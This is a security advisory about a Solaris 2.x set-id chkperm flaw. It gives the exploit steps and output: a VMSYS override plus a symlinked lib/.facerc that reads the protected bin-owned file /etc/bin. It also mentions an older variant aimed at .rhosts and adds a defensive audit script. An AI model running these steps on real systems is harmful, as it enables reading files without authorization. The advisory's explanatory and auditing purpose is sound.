COMMAND

    /usr/vmsys/bin/chkperm

SYSTEMS AFFECTED

    Solaris 2.x

PROBLEM

    Brock Tellier found the following.  /usr/vmsys/bin/chkperm can be
    used to read bin-owned files.  All testing was done on Solaris 2.7
    and 2.6 SPARC edition.  This one isn't nearly as interesting as the
    instant-shell variety.  Here's how it works.  chkperm is suid/sgid
    bin as shown:

        bash-2.02$ ls -la /usr/vmsys/bin/chkperm
        -rwsr-sr-x   1 bin      bin        10080 Sep  1  1998 /usr/vmsys/bin/chkperm

    /etc/bin  is  a  bin/bin  owned  file  mode 660 (thus shouldn't be
    readable by those not being bin) as shown:

        bash-2.02$ ls -la /etc/bin
        -rw-rw----   1 bin      bin           45 Nov 15 16:44 /etc/bin

    The exploit goes as follows:

        bash-2.02$ export VMSYS=/usr/home/$USER
        bash-2.02$ mkdir lib
        bash-2.02$ chmod 777 lib
        bash-2.02$ ln -s /etc/bin lib/.facerc
        bash-2.02$ /usr/vmsys/bin/chkperm -l
        seekret1
        seekret2
        seekret3
        seekret4
        seekr
        bash-2.02$

    As we can see, it cuts off the last of the five lines for some
    reason.  The meat of this exploit is that chkperm lets the caller
    choose, through the VMSYS environment variable, the directory in
    which it reads and writes files with known names (here lib/.facerc);
    a set-id program trusting a user-controlled path is a big no-no.
    Brock hasn't been able to get chkperm to either a) change the
    permissions of an existing bin-owned file or b) create a bin-owned
    file other than .facerc, though .facerc itself can be created
    anywhere on the filesystem via export VMSYS=/etc or some such
    command.
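    The script below is an added audit helper, not part of Brock Tellier's
    report or of Solaris.  It looks for the two conditions the advisory
    relies on: a set-id binary, and a symbolic link planted at a known
    file name (lib/.facerc, as the advisory describes) inside a directory
    the caller picks through an environment variable.  The $VMSYS/lib/.facerc
    layout is taken from the advisory; the binary name, the temporary tree
    and the file contents are constructed, and the script assumes a modern
    POSIX shell with find -perm and readlink rather than the Solaris 2.x
    userland of the original.

```shell
#!/bin/sh
# Added audit helper (not from the advisory or from Solaris).  Flags the two
# conditions the chkperm report relies on: a set-id binary, and a symbolic
# link planted at a known name under a caller-chosen directory ($VMSYS/lib/.facerc).
# Assumes POSIX sh plus find -perm and readlink; paths other than lib/.facerc
# are constructed for the demonstration.

# setid_bits FILE: print "suid", "sgid", "suid sgid" or an empty line.
setid_bits() {
    _f=$1
    _bits=""
    [ -n "$(find "$_f" -prune -perm -4000 2>/dev/null)" ] && _bits="suid"
    [ -n "$(find "$_f" -prune -perm -2000 2>/dev/null)" ] && _bits="${_bits:+$_bits }sgid"
    printf '%s\n' "$_bits"
}

# escaping_link DIR NAME: return 0 when DIR/NAME is a symbolic link whose
# target lies outside DIR (or cannot be resolved), 1 when it is a plain file
# or a link that stays inside DIR.  A privileged program honouring a
# caller-supplied DIR has to treat the first case as an error.
escaping_link() {
    _dir=$1
    _path=$1/$2
    [ -L "$_path" ] || return 1
    _target=$(readlink "$_path")
    case $_target in
        /*) ;;                           # absolute target, use as is
        *)  _target=$_dir/$_target ;;    # relative target, resolve against DIR
    esac
    # Canonicalise both sides with cd/pwd -P so '..' and nested links collapse.
    _canon_dir=$(cd "$_dir" 2>/dev/null && pwd -P) || return 0
    _tdir=$(cd "$(dirname "$_target")" 2>/dev/null && pwd -P) || return 0
    case "$_tdir/" in
        "$_canon_dir"/*) return 1 ;;
        *)               return 0 ;;
    esac
}

# audit_vmsys BINARY VMSYS_DIR: one finding per line; no output means neither
# condition was observed.
audit_vmsys() {
    _bin=$1
    _vmsys=$2
    _b=$(setid_bits "$_bin")
    if [ -n "$_b" ]; then
        printf '%s is %s (owner %s)\n' "$_bin" "$_b" "$(ls -ld "$_bin" | awk '{print $3}')"
    fi
    if escaping_link "$_vmsys/lib" .facerc; then
        printf '%s/lib/.facerc is a link to %s outside the VMSYS tree\n' \
            "$_vmsys" "$(readlink "$_vmsys/lib/.facerc")"
    fi
}

# Constructed demonstration tree under mktemp; no real system files are touched.
demo() {
    _t=$(mktemp -d)
    mkdir -p "$_t/home/lib" "$_t/etc" "$_t/usr/vmsys/bin"
    printf 'seekret1\n' > "$_t/etc/bin"              # stands in for the 660 file
    : > "$_t/usr/vmsys/bin/chkperm"                 # stands in for the binary
    chmod 4755 "$_t/usr/vmsys/bin/chkperm"          # set-uid, as the real one is
    ln -s "$_t/etc/bin" "$_t/home/lib/.facerc"      # the planted link
    audit_vmsys "$_t/usr/vmsys/bin/chkperm" "$_t/home"
    rm -rf "$_t"
}

demo
```

    On a real host the same two functions would be pointed at the
    installed binary and at whatever directory a user's VMSYS names;
    the escaping_link check is the test a set-id program itself should
    perform before opening anything under a caller-controlled path.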

    This exploit is sort of a variation on the old chkperm exploit,
    which allowed .facerc to be linked to /usr/bin/.rhosts.  That
    particular problem was fixed, but this one was left behind.

SOLUTION

    Nothing yet.